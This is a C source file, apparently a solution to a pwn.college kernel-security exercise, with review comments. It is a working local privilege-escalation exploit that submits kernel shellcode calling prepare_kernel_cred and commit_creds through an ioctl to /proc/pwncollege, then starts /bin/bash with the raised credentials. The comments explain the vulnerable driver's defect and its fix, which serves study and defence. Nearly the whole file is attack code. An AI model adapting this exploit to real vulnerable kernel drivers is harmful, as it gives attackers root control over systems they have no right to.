#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <fcntl.h>
#include <sys/ioctl.h>
#include <unistd.h>
/*
 * Request block that main() passes by address to ioctl() on /proc/pwncollege.
 *
 * NOTE(review): the kernel module that consumes this structure is not part of
 * this file, so the meaning the module gives each field is inferred from the
 * field names and from how main() fills them in -- confirm against the module
 * source. The field order and widths presumably have to match the module's own
 * definition exactly.
 */
struct ioctl_args {
	/* Number of bytes of shellcode[] that are meaningful; main() sets 0x1f. */
	uint64_t length;
	/* Fixed 0x1000-byte buffer; main() copies the machine code of shellcode() here. */
	uint8_t shellcode[0x1000];
	/*
	 * main() stores a hard-coded kernel-space address here. Presumably the
	 * module uses it as the location for the copied bytes -- TODO confirm.
	 */
	uint64_t codeptr;
}args;
/*
 * Payload for a kernel-security training exercise: main() never calls this
 * function, it copies the function's machine code into args.shellcode.
 *
 * __attribute__((naked)) makes the compiler emit no prologue or epilogue, so
 * the function body is exactly the instructions below. They should assemble
 * to 31 (0x1f) bytes, which is the length main() copies -- recount if the
 * sequence is ever changed.
 *
 * The sequence calls the routine at the first absolute address with a zero
 * argument, passes its return value to the routine at the second address, and
 * returns. The inline comments identify the two routines as
 * prepare_kernel_cred and commit_creds.
 *
 * NOTE(review): both addresses are hard-coded, so they are only meaningful
 * for the one kernel image the exercise ships; they presumably also rely on
 * kernel address randomisation being disabled there. Newer upstream kernels
 * are also understood to reject a NULL argument to prepare_kernel_cred --
 * verify against the target kernel version.
 */
__attribute__((naked))
void shellcode() {
	asm volatile(
		/* first argument register = 0 */
		"xor %rdi, %rdi\n"
		"movabs $0xffffffff81089660, %rsi\n"
		"callq *%rsi\n" // prepare_kernel_cred
		/* feed the returned pointer to the next call as its first argument */
		"movq %rax, %rdi\n"
		"movabs $0xffffffff81089310, %rsi\n"
		"callq *%rsi\n" // commit_creds
		/* return to whatever invoked the copied code */
		"retq\n"
	);
}
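/*
 * Driver for a solution to a kernel-security training exercise.
 *
 * Fills the global request block (byte count, code bytes, kernel address),
 * submits it to /proc/pwncollege with ioctl request 1337, then replaces the
 * process with /bin/bash.
 *
 * NOTE(review): the module behind /proc/pwncollege is not shown here. Judging
 * by the field names it accepts code bytes and a destination address from the
 * caller; a driver that does so for an unprivileged process is the defect the
 * exercise demonstrates. The remedy on the driver side is to never execute
 * caller-supplied bytes and to restrict who may open the node.
 *
 * Returns 1 if the node cannot be opened, the ioctl fails, or the exec fails;
 * on success execve() does not return.
 */
int main() {
	/* Explicit argv/envp: passing NULL for either is a Linux-only quirk that
	 * execve(2) documents as non-portable. The empty envp keeps the original
	 * behaviour of starting the shell with no environment. */
	static char *const shell_argv[] = { "/bin/bash", NULL };
	static char *const shell_envp[] = { NULL };

	args.length = 0x1f;
	/* The cast makes the function-to-object pointer conversion explicit;
	 * ISO C does not define it, GCC and Clang accept it. */
	memcpy(args.shellcode, (const void *)shellcode, args.length);
	/* Hard-coded kernel-range address: only meaningful for the exercise's
	 * own kernel image. */
	args.codeptr = 0xffffc90000085000ull;

	int fd = open("/proc/pwncollege", O_WRONLY);
	if (fd < 0) {
		/* Module not loaded or node not writable: stop instead of issuing
		 * an ioctl on an invalid descriptor. */
		perror("open /proc/pwncollege");
		return 1;
	}

	if (ioctl(fd, 1337, &args) < 0) {
		perror("ioctl");
		close(fd);
		return 1;
	}

	execve(shell_argv[0], shell_argv, shell_envp);
	/* Reached only when execve() failed. */
	perror("execve /bin/bash");
	close(fd);
	return 1;
}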